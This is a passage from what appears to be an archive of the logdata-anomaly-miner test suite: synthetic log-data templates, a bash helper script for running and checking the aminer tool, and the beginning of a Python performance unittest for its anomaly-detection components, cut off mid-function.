Random: 83829 Random: 31521 Random: 42596 Random: 5687 Random: 58642 Random: 65931 Random: 57658 Random: 15693 Random: 7534 Random: 12311 Random: 56644 Random: 77670 Random: 14175 Random: 59887 Random: 11717 Random: 14783 Random: 15503 Random: 75391 Random: 18644 Random: 13260 Random: 51701 Random: 60789 Random: 13497 Random: 57472 Random: 35255 Random: 35782 Random: 43238 Random: 18718 Random: 44907 Random: 27974 Random: 75586 Random: 60078 Random: 60865 Random: 30213 Random: 19708 Random: 7868 Random: 62418 Random: 49624 Random: 8091 Random: 64423 Random: 53824 Random: 73947 Random: 14804 Random: 13523 Current Disk Data is: Filesystem Type Size Used Avail Use% % Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% User admin changed IP address to 10.0.0.224 User user changed IP address to 10.0.0.41 User guest2 changed IP address to 10.0.0.9 User guest2 changed IP address to 10.0.0.168 User guest2 changed IP address to 10.0.0.156 2019-09-19 16:33:50 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:33:56 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:02 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:07 ubuntu cron[50001]: Job `cron.daily' started 2019-09-19 16:34:08 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:15 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:16 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:21 ubuntu cron[50000]: Job `cron.daily' started User username logged in User root logged in syslog_low_performance_many_outputs-template000066400000000000000000000202041437606560100370560ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:13 ubuntu user cron[28683]: Job `cron.daily` started. 56 149 172 165 21 126 53 10 197 159 19 184 111 200 83 121 127 0 69 161 139 76 151 152 77 53 139 166 151 18 128 128 119 79 159 160 101 70 0 134 32 67 152 119 50 121 186 173 104 194 113 158 77 119 152 187 82 91 44 169 117 26 26 32 49 198 35 147 66 49 47 154 48 136 106 5 97 115 109 157 16 187 55 149 183 25 41 49 26 30 155 75 149 105 90 103 93 193 Random: 61646 Random: 81742 Random: 22454 Random: 61172 Random: 59230 Random: 57422 Random: 24186 Random: 13177 Random: 67097 Random: 77130 Random: 37168 Random: 42606 Random: 16250 Random: 16423 Random: 12743 Random: 47250 Random: 62026 Random: 28145 Random: 25117 Random: 11797 Random: 43684 Random: 56609 Random: 62107 Random: 57898 Random: 25565 Random: 40031 Random: 44657 Random: 34302 Random: 36463 Random: 7023 Random: 86129 Random: 41616 Random: 73781 Random: 83829 Random: 31521 Random: 42596 Random: 5687 Random: 58642 Random: 65931 Random: 57658 Random: 15693 Random: 7534 Random: 12311 Random: 56644 Random: 77670 Random: 14175 Random: 59887 Random: 11717 Random: 14783 Random: 15503 Random: 75391 Random: 18644 Random: 13260 Random: 51701 Random: 60789 Random: 13497 Random: 57472 Random: 35255 Random: 35782 Random: 43238 Random: 18718 Random: 44907 Random: 27974 Random: 75586 Random: 60078 Random: 60865 Random: 30213 Random: 19708 Random: 7868 Random: 62418 Random: 49624 Random: 8091 Random: 64423 Random: 53824 Random: 73947 Random: 14804 Random: 13523 CPU Temp: 62°C, CPU Workload: 82%, 2019-09-19 16:33:39 CPU Temp: 30°C, CPU Workload: 77%, 2019-09-19 16:33:39 CPU Temp: 42°C, CPU Workload: 62%, 2019-09-19 16:33:39 CPU Temp: 31°C, CPU Workload: 43%, 2019-09-19 16:33:40 CPU Temp: 84°C, CPU Workload: 77%, 2019-09-19 16:33:40 CPU Temp: 43°C, CPU Workload: 34%, 2019-09-19 16:33:40 CPU Temp: 59°C, CPU Workload: 56%, 2019-09-19 16:33:40 CPU Temp: 61°C, CPU Workload: 44%, 2019-09-19 16:33:41 Current Disk Data is: Filesystem Type Size Used Avail Use% % Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% User admin changed IP address to 10.0.0.224 User user changed IP address to 10.0.0.41 User guest2 changed IP address to 10.0.0.9 User guest2 changed IP address to 10.0.0.168 User guest2 changed IP address to 10.0.0.156 2019-09-19 16:33:50 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:33:56 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:02 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:07 ubuntu cron[50001]: Job `cron.daily' started 2019-09-19 16:34:08 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:15 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:16 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:21 ubuntu cron[50000]: Job `cron.daily' started User username logged in User root logged in User user logged in 6 minutes ago. User root logged in 6 minutes ago. dafsdff12%3§fasß?–_=yy VXNlcm5hbWU6ICJ1c2VyIgpQYXNzd29yZDogInBhc3N3b3JkIg== Current DateTime: 19.09.2019 16:34:26 -25878952156245.222239655488955 - 3695465546654 This is some part of a csv file; match data: 25000 b654686973206973206a7573742061206e6f726d616c2074657874 Gateway IP-Address: 192.168.128.225 Feb 25 2019 The-searched-element-was-found! drawn number: 38drawn number: 30drawn number: 15drawn number: 5drawn number: 9 --------------------------------------------------------------------- lbtujyvysrcry logdata-anomaly-miner-2.6.1/aecid-testsuite/testFunctions.sh000077500000000000000000000046351437606560100242240ustar00rootroot00000000000000#!/bin/bash function testConfigError() { RET=0 if [[ !$# -eq 2 ]]; then echo echo "testConfigError() needs exactly 2 parameters!" return 1 fi if [[ `grep -ic "VerboseUnparsedAtomHandler" $1` != 0 ]] || `grep -Fq "Traceback" $1` || `grep -Fq "{'Parser'" $1` || `grep -Fq "FATAL" $1` || `grep -Fq "Config-Error" $1`; then echo "$2" RET=1 cat $1 echo echo fi return $RET } function compareStrings() { RET=0 if [[ !$# -eq 3 ]]; then echo echo "compareStrings() needs exactly 3 parameters!" return 1 fi if [[ "$1" != "$2" ]]; then echo "$1" echo echo "$3" echo echo "$2" echo RET=1 fi return $RET } function compareVersionStrings(){ if [[ !$# -eq 2 ]]; then echo "compareVersionStrings() needs exactly 2 parameters!" return -1 fi IFS='-' read -ra VERSION <<< "$1" VERSION="${VERSION[0]}" IFS='.' read -ra V1 <<< "$VERSION" IFS='-' read -ra VERSION <<< "$2" VERSION="${VERSION[0]}" IFS='.' read -ra V2 <<< "$VERSION" LEN1=${#V1[@]} LEN2=${#V2[@]} LEN=$(( LEN1 < LEN2 ? LEN1 : LEN2 )) # minimum length for ((i=0; i < $LEN; i++)); do if [[ "${V1[i]}" -lt "${V2[i]}" ]]; then return 2 elif [[ "${V1[i]}" -gt "${V2[i]}" ]]; then return 1 fi done return 0 } function runAminerUntilEnd() { CMD=$1 LOGFILE=$2 REP_PATH=$3 CFG_PATH=$4 if [[ $CFG_PATH == *.py ]]; then echo "config_properties['Core.PersistencePeriod'] = 1" | sudo tee -a $CFG_PATH > /dev/null elif [[ $CFG_PATH == *.yml ]]; then echo "Core.PersistencePeriod: 1" | sudo tee -a $CFG_PATH > /dev/null else return 2 fi sudo rm $REP_PATH 2> /dev/null if [ $# -ge 5 ]; then OUT=$5 $CMD > $OUT & elif [ $# -eq 4 ]; then $CMD & fi PID=$! FILE_SIZE=`stat --printf="%s" $LOGFILE 2> /dev/null` IN=`cat $REP_PATH 2> /dev/null` IFS=',' read -ra ADDR <<< "$IN" CURRENT_SIZE=`echo ${ADDR[1]} | sed 's/ *$//g'` # trim all whitespaces CNTR=0 while [[ ("$CURRENT_SIZE" != "$FILE_SIZE" || "$CURRENT_SIZE" == "") && $CNTR -lt 20 ]]; do sleep 1 IN=`cat $REP_PATH 2> /dev/null` IFS=',' read -ra ADDR <<< "$IN" CURRENT_SIZE=`echo ${ADDR[1]} | sed 's/ *$//g'` # trim all whitespaces CNTR=$((++CNTR)) done sleep 3 sudo sed -i '$d' $CFG_PATH # delete PersistencePeriod config in file. if [ $# -lt 6 ]; then sudo pkill -x aminer wait $PID RES=$? return $RES fi return $PID } logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/000077500000000000000000000000001437606560100217645ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/AnalysisComponentsPerformanceTest.py000066400000000000000000002503201437606560100312130ustar00rootroot00000000000000import unittest from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathListValueDetector from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector from aminer.analysis.AtomFilters import MatchPathFilter, SubhandlerFilter, MatchValueFilter from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector from aminer.analysis.EventSequenceDetector import EventSequenceDetector from aminer.analysis.HistogramAnalysis import ModuloTimeBinDefinition, HistogramData, HistogramAnalysis from aminer.analysis.TimeCorrelationViolationDetector import CorrelationRule, EventClassSelector, TimeCorrelationViolationDetector from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust from aminer.analysis.Rules import PathExistsMatchRule from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector from aminer.analysis.ParserCount import ParserCount from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector from aminer.analysis.MatchFilter import MatchFilter from aminer.analysis.VariableTypeDetector import VariableTypeDetector from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from unit.TestBase import TestBase import time import random from time import process_time from _io import StringIO import timeit import pickle # skipcq: BAN-B403 class AnalysisComponentsPerformanceTest(TestBase): """These unittests test the performance of all analysis components.""" result_string = 'The %s could in average handle %d LogAtoms %s with %s\n' result = '' iterations = 2 waiting_time = 1 integerd = 'integer/d' different_paths = '%d different path(es).' different_attributes = '%d different attribute(s).' @classmethod def tearDownClass(cls): """Run the TestBase tearDownClass method and print the results.""" super(AnalysisComponentsPerformanceTest, cls).tearDownClass() print('\nwaiting time: %d seconds' % cls.waiting_time) print(cls.result) def setUp(self): """Set up needed variables.""" TestBase.setUp(self) self.output_stream = StringIO() self.stream_printer_event_handler = StreamPrinterEventHandler(self.analysis_context, self.output_stream) def run_atom_filters_match_path_filter(self, number_of_paths): """Run the performance tests for AtomFilters.MatchPathFilter.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) subhandler_filter = SubhandlerFilter([], stop_when_handled_flag=True) i = 0 while i < number_of_paths: match_path_filter = MatchPathFilter([(self.integerd + str(i), new_match_path_detector)], None) subhandler_filter.add_handler(match_path_filter, stop_when_handled_flag=True) i = i + 1 t = round(time.time(), 3) # worst case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(123456789).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_path_filter) worst_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000) # best case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(123456789).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_path_filter) best_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000) results[z] = int((worst_case + best_case) / 2) z = z + 1 avg = avg + (worst_case + best_case) / 2 avg = int(avg / self.iterations) type(self).result = self.result + self.result_string % ( subhandler_filter.__class__.__name__, avg, results, '%d different %ss with a %s.' % ( number_of_paths, match_path_filter.__class__.__name__, new_match_path_detector.__class__.__name__)) def run_atom_filters_match_value_filter(self, number_of_paths): """Run the performance tests for AtomFilters.MatchValueFilter.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) subhandler_filter = SubhandlerFilter([], stop_when_handled_flag=True) i = 0 dictionary = {} while i < 1000000: dictionary[i] = new_match_path_detector i = i + 1 i = 0 while i < number_of_paths: match_value_filter = MatchValueFilter(self.integerd + str(i % number_of_paths), dictionary, None) subhandler_filter.add_handler(match_value_filter, stop_when_handled_flag=True) i = i + 1 t = round(time.time(), 3) # worst case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(123456789).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_value_filter) worst_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000) # best case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(123456789).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_value_filter) best_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000) results[z] = int((worst_case + best_case) / 2) z = z + 1 avg = avg + (worst_case + best_case) / 2 avg = int(avg / self.iterations) type(self).result = self.result + self.result_string % ( subhandler_filter.__class__.__name__, avg, results, '%d different %ss with a dictionary of %ss.' % ( number_of_paths, match_value_filter.__class__.__name__, new_match_path_detector.__class__.__name__)) def run_new_match_path_detector(self, number_of_paths): """Run the performance tests for NewMatchPathDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) t = round(time.time(), 3) measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, new_match_path_detector) measured_time += timeit.timeit(lambda: new_match_path_detector.receive_atom(log_atom), number=1) i += 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( new_match_path_detector.__class__.__name__, avg, results, self.different_paths % number_of_paths) def run_enhanced_new_match_path_value_combo_detector(self, number_of_paths): """Run the performance tests for EnhancedNewMatchPathValueComboDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 path_list = [] while i < number_of_paths: path_list.append(self.integerd + str(i % number_of_paths)) i = i + 1 enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector( self.aminer_config, path_list, [self.stream_printer_event_handler], 'Default', True, True) t = round(time.time(), 3) # worst case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(123456789).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, enhanced_new_match_path_value_combo_detector) worst_case = self.waiting_time / ( timeit.timeit(lambda: enhanced_new_match_path_value_combo_detector.receive_atom(log_atom), number=10000) / 10000) # best case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(123456789).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, enhanced_new_match_path_value_combo_detector) best_case = self.waiting_time / ( timeit.timeit(lambda: enhanced_new_match_path_value_combo_detector.receive_atom(log_atom), number=10000) / 10000) results[z] = int((worst_case + best_case) / 2) z = z + 1 avg = avg + (worst_case + best_case) / 2 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( enhanced_new_match_path_value_combo_detector.__class__.__name__, avg, results, self.different_attributes % number_of_paths) def run_histogram_analysis(self, number_of_paths, amplifier): """Run the performance tests for HistogramAnalysis.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 86400 / number_of_paths, 0, 1, number_of_paths, False) histogram_data = HistogramData('match/crontab', modulo_time_bin_definition) histogram_analysis = HistogramAnalysis( self.aminer_config, [(histogram_data.property_path, modulo_time_bin_definition)], amplifier * self.waiting_time, [self.stream_printer_event_handler], False, 'Default') i = 0 measured_time = 0 t = time.time() while measured_time < self.waiting_time / 10: rand = random.randint(0, 100000) match_element = MatchElement('match/crontab', str(t + rand).encode(), t + rand, None) log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + i, histogram_analysis) measured_time += timeit.timeit(lambda: histogram_analysis.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( histogram_analysis.__class__.__name__, avg, results, '%d bin(s) and output after %d elements.' % ( number_of_paths, amplifier * self.waiting_time)) def run_match_value_average_change_detector(self, number_of_paths): """Run the performance tests for MatchValueAverageChangeDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 path_list = [] while i < number_of_paths: path_list.append(self.integerd + str(i % number_of_paths)) i = i + 1 t = time.time() match_value_average_change_detector = MatchValueAverageChangeDetector(self.aminer_config, [ self.stream_printer_event_handler], None, path_list, 2, t, False, 'Default') i = 0 while i < number_of_paths: match_element = MatchElement(self.integerd + str(i), b'%d' % t, t, None) log_atom = LogAtom( match_element.get_match_object(), ParserMatch(match_element), t, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element = MatchElement(self.integerd + str(i), b'%d' % (t + 0.1), t + 0.1, None) log_atom = LogAtom( match_element.get_match_object(), ParserMatch(match_element), t + 0.1, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element = MatchElement(self.integerd + str(i), b'%d' % (t + 0.2), t + 0.2, None) log_atom = LogAtom( match_element.get_match_object(), ParserMatch(match_element), t + 0.2, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element = MatchElement(self.integerd + str(i), b'%d' % (t + 10), t + 10, None) log_atom = LogAtom( match_element.get_match_object(), ParserMatch(match_element), t + 10, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) i = i + 1 t = time.time() # worst case match_element = MatchElement(self.integerd + str(number_of_paths - 1), b'%d' % t, t, None) log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t, match_value_average_change_detector) worst_case = self.waiting_time / ( timeit.timeit(lambda: match_value_average_change_detector.receive_atom(log_atom), number=10000) / 10000) # best case match_element = MatchElement(self.integerd + str(0), b'%d' % t, t, None) log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t, match_value_average_change_detector) best_case = self.waiting_time / ( timeit.timeit(lambda: match_value_average_change_detector.receive_atom(log_atom), number=10000) / 10000) results[z] = int((worst_case + best_case) / 2) z = z + 1 avg = avg + (worst_case + best_case) / 2 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( match_value_average_change_detector.__class__.__name__, avg, results, self.different_paths % number_of_paths) def run_match_value_stream_writer(self, number_of_paths): """Run the performance tests for MatchValueStreamWriter.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 path_list = [] parsing_model = [] while i < number_of_paths / 2: path_list.append('match/integer/d' + str(i % number_of_paths)) path_list.append('match/integer/s' + str(i % number_of_paths)) parsing_model.append( DecimalIntegerValueModelElement('d' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)) parsing_model.append(FixedDataModelElement('s' + str(i % number_of_paths), b' Euro ')) i = i + 1 sequence_model_element = SequenceModelElement('integer', parsing_model) match_value_stream_writer = MatchValueStreamWriter(self.output_stream, path_list, b';', b'-') t = time.time() data = b'' for j in range(1, int(number_of_paths / 2) + number_of_paths % 2 + 1): data = data + str(j).encode() + b' Euro ' match_context = MatchContext(data) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, match_value_stream_writer) results[z] = int(self.waiting_time / ( timeit.timeit(lambda: match_value_stream_writer.receive_atom(log_atom), number=10000) / 10000)) z = z + 1 avg = avg + results[z - 1] avg = avg / self.iterations type(self).result = self.result + self.result_string % ( match_value_stream_writer.__class__.__name__, avg, results, self.different_paths % number_of_paths) def run_missing_match_path_value_detector(self, number_of_paths): """Run the performance tests for MissingMatchPathValueDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 path_list = [] while i < number_of_paths: path_list.append(self.integerd + str(i % number_of_paths)) i = i + 1 missing_match_path_list_value_detector = MissingMatchPathListValueDetector( self.aminer_config, path_list, [self.stream_printer_event_handler], 'Default', True, 3600, 86400) t = time.time() # worst case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(number_of_paths - 1), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(1).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, missing_match_path_list_value_detector) worst_case = self.waiting_time / ( timeit.timeit(lambda: missing_match_path_list_value_detector.receive_atom(log_atom), number=10000) / 10000) # best case decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(1).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, missing_match_path_list_value_detector) best_case = self.waiting_time / ( timeit.timeit(lambda: missing_match_path_list_value_detector.receive_atom(log_atom), number=10000) / 10000) results[z] = (worst_case + best_case) / 2 z = z + 1 avg = avg + (worst_case + best_case) / 2 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( missing_match_path_list_value_detector.__class__.__name__, avg, results, self.different_paths % number_of_paths) def run_new_match_path_value_combo_detector(self, number_of_paths): """Run the performance tests for NewMatchPathValueComboDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 path_list = [] while i < number_of_paths: path_list.append(self.integerd + str(i % number_of_paths)) i = i + 1 new_match_path_value_combo_detector = NewMatchPathValueComboDetector( self.aminer_config, path_list, [self.stream_printer_event_handler], 'Default', True, True) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), 